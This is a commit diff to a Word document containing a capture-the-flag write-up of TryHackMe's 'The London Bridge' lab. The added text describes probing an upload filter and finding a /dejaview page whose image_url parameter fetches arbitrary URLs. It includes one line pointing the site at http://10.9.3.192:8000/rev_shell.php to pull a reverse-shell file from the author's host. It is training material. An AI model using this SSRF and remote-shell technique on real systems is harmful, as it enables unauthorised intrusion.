<commit_message>
Continue the london bridges thm ctf
</commit_message>
<xml_diff>
--- a/THM_challenges/Medium/The London Bridge/The_London_Bridge_Solution_Documentation.docx
+++ b/THM_challenges/Medium/The London Bridge/The_London_Bridge_Solution_Documentation.docx
@@ -202,6 +202,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52A81590" wp14:editId="30099EEB">
@@ -306,6 +309,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142AEAFC" wp14:editId="13A9168E">
             <wp:extent cx="3798899" cy="1169771"/>
@@ -350,6 +356,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24517118" wp14:editId="636C6D0C">
             <wp:extent cx="2636748" cy="502964"/>
@@ -403,8 +412,458 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> I tried to</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> upload </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a regular image, and it worked so I found that there is a file type filter system</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. I also tried using burpsuit to add to the file content the png magic </w:t>
+      </w:r>
+      <w:r>
+        <w:t>number,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> but it still didn’t work.</w:t>
+      </w:r>
     </w:p>
     <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Then, I moved to enumerate directories using </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Burpsuite</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. I found an new directory named “</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/dejaview</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5267210F" wp14:editId="457044DB">
+            <wp:extent cx="6409266" cy="2598257"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1262715204" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1262715204" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6414664" cy="2600445"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This is the page:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="156C8433" wp14:editId="38E7F387">
+            <wp:extent cx="3609837" cy="2277534"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="1217930456" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1217930456" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, תוכנה, תכונות מולטימדיה&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3613394" cy="2279778"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">I </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tried to give a URL for an image </w:t>
+      </w:r>
+      <w:r>
+        <w:t>from the gallery, and it worked:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B70C4E" wp14:editId="7BD49DF8">
+            <wp:extent cx="3090151" cy="2730500"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2065505132" name="תמונה 1" descr="תמונה שמכילה הנעלה, לבוש, ענן, אדם&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2065505132" name="תמונה 1" descr="תמונה שמכילה הנעלה, לבוש, ענן, אדם&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3093137" cy="2733139"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Now, I </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tried to give </w:t>
+      </w:r>
+      <w:r>
+        <w:t>an URL</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> from another source on the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>internet,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>and it also worked!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E89B93F" wp14:editId="43F36323">
+            <wp:extent cx="1627236" cy="2548466"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="532896258" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, סרטים מצוירים, איור&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="532896258" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, סרטים מצוירים, איור&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1630673" cy="2553848"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Now, I </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">established a basic python http </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">server on my machine so I can share the rev shell </w:t>
+      </w:r>
+      <w:r>
+        <w:t>file to the website:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06395D52" wp14:editId="61BDBC73">
+            <wp:extent cx="3703641" cy="369602"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="513147269" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="513147269" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3703641" cy="369602"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">After checking the server, I called the file from the website using this URL: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://10.9.3.192:8000/rev_shell.php</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>and the server got the file:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65B2CD9B" wp14:editId="1EAE1B6F">
+            <wp:extent cx="7556500" cy="390525"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
+            <wp:docPr id="314794220" name="תמונה 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="314794220" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="7556500" cy="390525"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">I opened Burpsuite again and found that the packet contains the parameter “image_url” which indicate the file’s url so maybe there is another </w:t>
+      </w:r>
+      <w:r>
+        <w:t>parameter according to the thm’s hint</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F64283" wp14:editId="4A9753EB">
+            <wp:extent cx="6074833" cy="2741843"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
+            <wp:docPr id="1143280123" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1143280123" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6081738" cy="2744960"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Now, I </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">wanted to bruteforce parameters names </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">using </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">“FFUF” </w:t>
+      </w:r>
+      <w:r>
+        <w:t>in order to discover additional one</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s that will enable me to do another thing</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> than just see images</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="170" w:right="170" w:bottom="170" w:left="170" w:header="720" w:footer="720" w:gutter="0"/>

</xml_diff>